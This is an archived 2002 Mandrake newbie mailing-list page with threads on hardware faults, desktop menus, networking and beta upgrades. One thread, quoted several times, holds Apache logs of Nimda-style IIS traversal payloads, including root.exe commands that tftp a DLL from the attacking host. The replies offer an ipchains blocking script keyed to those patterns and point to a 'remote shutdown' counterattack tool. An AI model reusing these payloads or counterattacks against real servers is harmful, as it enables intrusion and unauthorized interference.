Re: [newbie] PC restars when i press b

2002-07-28 Thread civileme

Gerard G. Dangca II wrote:

>hi,
>
>I have this strange problem with my PC, it restarts whenever I press 
>b or simply "b".  could it be a virus? im using mandrake 8.2.  This problem
>also occurs with windows 98.  Or does it has something to do with my
>hardware.  im using an Epson endeavor laptop.
>
>--
>g2
>"intelligence, acquired; wisdom, inherent."
>LUN : 278414
>
>
>
>
>
>
>
>Want to buy your Pack or Services from MandrakeSoft? 
>Go to http://www.mandrakestore.com
>
When it hits both systems it is very likely hardware...  That sounds 
like either a motherboard problem decoding the key signals or a splash 
of soft drink on the keyboard.  Either one is a factory return item. 
 The other possibility is that a virus wrote itself into the BIOS, but 
the chances of this on a laptop are remote indeed as many do not even 
have a falsh capability for the BIOS, and those that do are not 
particularly standard in how it is implemented.

Civileme







Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Menus damaged when KDE removed

2002-07-28 Thread civileme

Mad Scientist wrote:

>On Sunday 28 July 2002 02:21 pm, you wrote:
>
>>If you look at /usr/lib/menu you will see all sorts of files that have
>>to do with menu.  In those files is a needs clause.
>>
>>If it needs kde then it disappears when kde is removed.  Those files are
>>written directly into the mdk rpm spec files and are cleaned when things
>>are removed.
>>
>>If you remove KDE surely you did not expect anything depending on KDE to
>>stick around.  Konqueror does have an embedded version, true, but that
>>version is not included with the distro.
>>
>>Now menu files can be in the system menu or in the user menu (which are
>>specific to each user) and they can appear for a specific desktop
>> 'Needs kde'  'needs gnome'  'needs blackbox'  are sometimes clauses
>>
>>There is considerable room for expansion in the menu structure.  The
>>"what to do?" is an example.  It is also easily possible to add another
>>clause to each menu item which defines a level so that a user could rate
>>his own level and if for example choosing newbie, see only the simplest
>>of apps.  This is easily done.
>>
>>What you will notice about our menus is that, to the extent possible,
>>they stay the same across desktops.  KDE and GNOME-specific items that
>>just need the widget set for each of those do propagate across desktops,
>>and are on some of them submenued as "KDE apps" or "GNOME Apps".
>>
>>In other words the system did what it was told which wasn't what you
>>expected.
>>
>
>This is all very helpful information and I'm starting to get a better 
>understanding of how these menus work. But I still can't solve this one. 
>Although the original poster indicated he had removed KDE, I'm not sure if 
>that's the problem. At least in my case, I never removed KDE. Also, it's not 
>just the KDE-related menus that are gone. All menus are gone. And they are 
>gone from all window managers. I basically have from "Run Command" and down 
>still there but everything above is gone. The original poster stated 
>"Everything has been lost from my menus except the freshly installed Gnome 
>apps." which sounds to me to be the same problem.
>
>When I go "Original menu" style, I do get all those menus, but they do not 
>relate to the apps I have installed. I can get the "What to do ?" menus to 
>show, but not the "All applications". And they are the ones that really fit 
>best with what I actually have installed.
>
>They *do* appear in menudrake. According to menudrake, everything looks 
>perfect. They just don't show in the real menus.
>
>Still confused,
>
>-Mad
>
>
>
>
>Want to buy your Pack or Services from MandrakeSoft? 
>Go to http://www.mandrakestore.com
>
OK in that case you have a local file that is overriding the menus.  It 
also may be that you installed a Ximian GNOME package which usually lags 
about six months in actually supporting mandrake so they break our menus 
until that point.  BTW, most of the functionality, but not the look & 
feel, of Ximian is already in the Mandrake rpms.

Or you have managed to catch the menu editor halfway through a save 
which can always have interesting results--we do have a "ShowBusyCursor" 
lockout because people used to quit it whioe it was still saving and I 
have not seen what you describe since Vincent locked out the early quitting.

Anyway, anytime something is done to the local menus, there is a hidden 
file called .menu-updates.stamp created and also there is the ~/.menu 
folder which concerns the actual menus.  There are additional items down 
in /etc but those need not concern you--those are regeneration methods, 
mostly , these days.

so

$ rm ~/.menu-  (tab for completion)
$ rm -r ~/.menu -f
$ su
Password: (your root password
# update-menus -v
(Watch out there is a cosmetic bug here that it needs a return pressed 
to show a prompt after it is done)
# exit
$ logout  (or better ctrl-alt-backspace)

login from the login manager

You should have functional menus

If you installed GNOME from a non-mandrake source, you will not have the 
GNOME menus that came with the install.  That is because we take the 
trouble to make the menus pretty much the same across desktops (and the 
Linux Standards Base has not addressed that issue for standardization 
yet, just Debian and Mandrake do that.)

Civileme













Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



RE: [newbie] ip forwarding(?) with iptables......

2002-07-28 Thread Ricardo Castanho de O. Freitas

On Sun, 28 Jul 2002, frankie wrote:

I've haven't tried gShield but I'm pretty happy (and safe!) with
pcx_firewall, which comes from gShield!

Taking both for analysis I still think that pcx_firewall is much
easier to setup up. Haven't seen the latest gShield though!

Ricardo

>try gShield (look it up in google..)
>It does port forwarding from scratch, and the save site has a perl script
>that generates IPTABLES rules for you..
>you just run the script passed with the ingoing IP and port, and the
>outgoing IP and port, and it will give you a rule for it..
>very handy..
>rgds
>Franki

--
==
Linux user # 102240 => Machine # 96125 => Seti@home user
==




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Menus damaged when KDE removed

2002-07-28 Thread Mad Scientist

On Sunday 28 July 2002 02:21 pm, you wrote:
> If you look at /usr/lib/menu you will see all sorts of files that have
> to do with menu.  In those files is a needs clause.
>
> If it needs kde then it disappears when kde is removed.  Those files are
> written directly into the mdk rpm spec files and are cleaned when things
> are removed.
>
> If you remove KDE surely you did not expect anything depending on KDE to
> stick around.  Konqueror does have an embedded version, true, but that
> version is not included with the distro.
>
> Now menu files can be in the system menu or in the user menu (which are
> specific to each user) and they can appear for a specific desktop
>  'Needs kde'  'needs gnome'  'needs blackbox'  are sometimes clauses
>
> There is considerable room for expansion in the menu structure.  The
> "what to do?" is an example.  It is also easily possible to add another
> clause to each menu item which defines a level so that a user could rate
> his own level and if for example choosing newbie, see only the simplest
> of apps.  This is easily done.
>
> What you will notice about our menus is that, to the extent possible,
> they stay the same across desktops.  KDE and GNOME-specific items that
> just need the widget set for each of those do propagate across desktops,
> and are on some of them submenued as "KDE apps" or "GNOME Apps".
>
> In other words the system did what it was told which wasn't what you
> expected.

This is all very helpful information and I'm starting to get a better 
understanding of how these menus work. But I still can't solve this one. 
Although the original poster indicated he had removed KDE, I'm not sure if 
that's the problem. At least in my case, I never removed KDE. Also, it's not 
just the KDE-related menus that are gone. All menus are gone. And they are 
gone from all window managers. I basically have from "Run Command" and down 
still there but everything above is gone. The original poster stated 
"Everything has been lost from my menus except the freshly installed Gnome 
apps." which sounds to me to be the same problem.

When I go "Original menu" style, I do get all those menus, but they do not 
relate to the apps I have installed. I can get the "What to do ?" menus to 
show, but not the "All applications". And they are the ones that really fit 
best with what I actually have installed.

They *do* appear in menudrake. According to menudrake, everything looks 
perfect. They just don't show in the real menus.

Still confused,

-Mad

-- 
Madness is soil in which creativity grows

 - Chris Bielek



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] interfaces not coming up

2002-07-28 Thread Brian Parish

On Mon, 2002-07-29 at 08:29, Duke Glover wrote:
> Hello Mandrake gods,
> 
> Here the problem.  I am attempting to install Mandrake 8.2 on an HP Kayak
> XM600.  Everything works fine except for one crucial piece.  I am unable to
> get the interfaces to come up (eth0 and eth1).  eth0 is an 3Com 3C905C TX
> and eth1 is a Linksys LNE100 TX.  I have used both of these cards in other
> systems so I know they work.  I have installed Mandrake 7.1 on other systems
> with these same models of cards and never had a problem.  The cards are
> detected correctly and I set them to use DHCP.  The only log entries that I
> have found that pertain to the problem simply say that eth0, and/or eth1,
> failed to receive a valid response from a dhcp server.  However, I can plug
> another system into the same interface I am using on my router for the
> system I am having problems with and I can get a dhcp address no problem.  I
> am at wits end with this system.  I have tried Mandrake 7.1 and 8.2.  All to
> no avail.  I cannot figure out what I am doing wrong.  Also, I have set
> dhcpcd to run at boot.
> 
> /pulling hair out now
> 
> Any ideas/suggestions greatly appreciated.
> 
> Thanks,
> 
> Duke
> 
Duke,

Well dhcpd is for serving dhcp requests from other nodes, so that isn't
going to help here.  Have you tried setting a static address for either
card to see if at least the interface will come up?  If that works, we
will know that it's a dhcp specific issue.  If it doesn't, we'll know -
well - something else ;-)

Brian




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] upgradeing to 9.0 beta

2002-07-28 Thread Curtis H

On Sun, 2002-07-28 at 08:29, Tom Brinkman wrote:
> 
> In early June I saved a copy of 8.2's /home/tom to a storage 
> partition and did a fresh install of 8.3/9.0 (the 6/6/02 'alpha' 
> release).  Immediately after the install, I copied the 8.2 /home backup 
> into 9.0, which instantly broke the whole system. I sort'a knew it 
> would ;) KDE wouldn't even start. Re-installed 9.0, and the first thing 
> I did was copy in from backup, my /Mail dir. Then Kmail had all my 
> saved, old to current emails and folders. In trying to copy in 8.2 
> kmailrc files (I saved the existing 9.0 rc files first), kmail broke. 
> So I reinstated the 9.0 kmail rc files, and reconfigured the newer 
> kmail version. 
> 
>It took a few minutes, not "many hours".  I had a similar experience 
> with KNode, several others. All in all, copying in what I could from my 
> /home backup, and reconfiguring everything I normally use, including 
> installing a few apps that don't come with Mandrake took little more 
> than an hour, maybe two at most.  Granted I've had to do all this many 
> times in the past with Mandrake version upgrades, so I pretty well know 
> in advance, what will/won't work, what can be saved/what shouldn't be.
> A lot of this knowledge comes from lurking on the cooker mailing list.
> 
>Since June, I've kept 9.0 current using 'urpmi --auto-select' on 
> cooker mirrors.  Occaisionally, some package upgrades will overrite a 
> old config file. Sometimes configuration is moved, and the old config 
> is obsolete (eg, ~/X11/fs/config for Gnome2 apps). The developers try'n 
> hold this to a bare minimum, but sometimes it's neccessary. Which is 
> just part of why a saved 8.2 /home won't work with 9.0. Other major 
> reasons are the vast changes in libraries and gcc. So for example, 
> stuff like flash, (Sun) java, and other 3rd party closed source stuff 
> is mostly worthless. At least until they get around to upgrading their 
> apps to the new gcc/libs. The vendors will have to, Mandrake can't do 
> it without their source, or for legal reasons. Many cookers have 
> reported some success with getting nvidia's src.rpms and other 3rd 
> party stuff to rebuild on 9.0 using IGNORE_GCC_MISMATCH=1 on src.rpms.  
> I haven't bothered.
> 
>In the past week, cooker has moved from gcc 3.1.1 to 3.2, requiring 
> that most all packages in 9.0 be completely rebuilt. Practically the 
> whole distro. I can't upgrade with just a dialup, so I'm stuck with 
> roughly 9.0b1 till I get 9.0beta2 CD's. When they come out, I already 
> know a complete wipe and fresh install will be wise, if not just plain 
> neccessary. So, much less 8.2 isn't compatible with 9.0, 9.0b1 isn't 
> even compatible with 9.0b2. While an upgrade might be possible, it 
> _would_ probly take "many hours" and lot'sa fixin. Easier an simpler 
> just to wipe, re-install, and do a little reconfiguring, save from 
> backup whatever's possible, re-do what isn't.
> 
>I never could figure out any worthwhile purpose for desktop icons 
> other than to clutter things up, any OS. The menu works just find for 
> starting stuff, sometimes better.  First thing always I do after a 
> fresh install is to delete all /Desktop icons except for Trash, which I 
> move so that the icon no longer appears.  Takes a minute ;>  YMMV
> -- 
> Tom Brinkman  Corpus Christi, Texas

Well, I disagree about having to reinstall.  I've kept cooker current
through urpmi (and the occasional 'rpm -Uvh --no-deps'--only 3 packages
needed it when the change to perl5.8 came) since 8.1.  You have to keep
an eye on rpm messages like .rpmnew/.rpmsave files, but it's not that
hard.  It's definitely not for someone who doesn't like using
terminals.  I found it's the GUI stuff that breaks most often.

-- 
/curtis  ><>

  Mandrake Linux 9.0 (cooker)
  Kernel Version 2.4.18-21mdk
   Uptime 21 hours 34 minutes




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] PC restars when i press b

2002-07-28 Thread Gerard G. Dangca II

hi,

I have this strange problem with my PC, it restarts whenever I press 
b or simply "b".  could it be a virus? im using mandrake 8.2.  This problem
also occurs with windows 98.  Or does it has something to do with my
hardware.  im using an Epson endeavor laptop.

--
g2
"intelligence, acquired; wisdom, inherent."
LUN : 278414






Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Problem with LM 9.0

2002-07-28 Thread Dennis Myers

On Sunday 28 July 2002 08:27 pm, you wrote:
> Anyone else that has installed 9.0 beta having major problems running the
> Control Center?  I can't run it at all from the menu, and can only run it
> via console as root.  Once I do that, it shows up, but nothing works
> properly in it.  Some of the apps completely lock up Control Center (I
> can't configure my network settings at all with it), and the others will
> run, but nothing will show up unless i switch to another window, and then
> switch back to the console.  Any suggestions?
>
> Thanks!
>
> Terry

Same here, I also have been unable to get my floppy drive to work correctly, 
keeps saying I don't have permissions. Even though I have set up for floppy, 
cdrom, etc. There is also no selection for audio anymore in userdrake.  Seems 
like several things don't really work, had to edit kpersonalizer to get the 
first time screen to quit popping up.  Tried to do bug reports and made a new 
bugzilla account and then followed the instructions to set up an account for 
9.0 and no response now and can't log a report on bugzilla. Oh well, I try 
again with beta2.
-- 
Dennis M. linux user #180842



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] Problem with LM 9.0

2002-07-28 Thread Terry Sheltra

Anyone else that has installed 9.0 beta having major problems running the 
Control Center?  I can't run it at all from the menu, and can only run it via 
console as root.  Once I do that, it shows up, but nothing works properly in 
it.  Some of the apps completely lock up Control Center (I can't configure my 
network settings at all with it), and the others will run, but nothing will 
show up unless i switch to another window, and then switch back to the 
console.  Any suggestions?

Thanks!

Terry



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Can't block dos attack

2002-07-28 Thread civileme

Ibly Piblo wrote:

>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point accross?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "
>

That is no DoS attack--tis the wailing of IIS infected trying to spread 
its misery.  

Go here...  Tis time to meet a friend.

http://pfortin.com/Linux/MSVTS/

And yes the remote shutdown is there.

While you are at it, you might want to make some more new friends

http://plf.zarb.org

Civileme

>





Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Can't block dos attack

2002-07-28 Thread Michael Viron

Try the script below, which should take care of the problem.  Of course,
this isn't a dos attack, it's a virus attack (one of the viruses going
around attempting to infect an iis server).

Which kernel are you using?  If it's 2.4.x, iptables is the way to block
things out.  (in that case let me know, and I'll adapt this to deal with
iptables).

Michael

-- Begin Script --

#!/bin/sh
#
# Block sites which originate Nimba queries from Apache server
# Apache must be configured with HostnameLookups Off
# Adapted from an earlier script found on one of the Mandrake lists
# Changes by Michael Viron
# Last Update: 2/20/2002
LOGS=/var/log/httpd
# Change IP to reflect yours.
DESTINATION = 192.168.1.1

cd $LOGS

grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/system32\/cmd\.exe/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done
# Block sites which originate Nimbda queries from Apache server
# Apache must be configured with HostnameLookups Off

#LOGS=/var/log/httpd
#cd $LOGS
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/scripts\/Admin\.dll/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done

grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/MSACD\/Admin\.dll/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done

grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/scripts\/root\.exe/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/default\.ida/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done
cat /etc/ipchains.add >> /etc/sysconfig/ipchains
/etc/rc.d/init.d/ipchains restart
rm -f /etc/ipchains.add

-- End Script --



At 05:29 PM 7/28/2002 -0700, you wrote:
>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point accross?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.
dl

[newbie] Can't block dos attack

2002-07-28 Thread Ibly Piblo

I am getting strange hits to my web server,
I don't like it and I wish to know how
to stop them from slipping past my defenses.

I try using ipchains, most addresses are
blocked, but for reasons I can't figure out,
this address 65.192.23.150 keeps showing up.

I don't understand it, if ipchains,
/etc/hosts.deny can't block it, what can?

Do I send back a command to shut down
their server?

How do I get the point accross?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 358 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 358 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
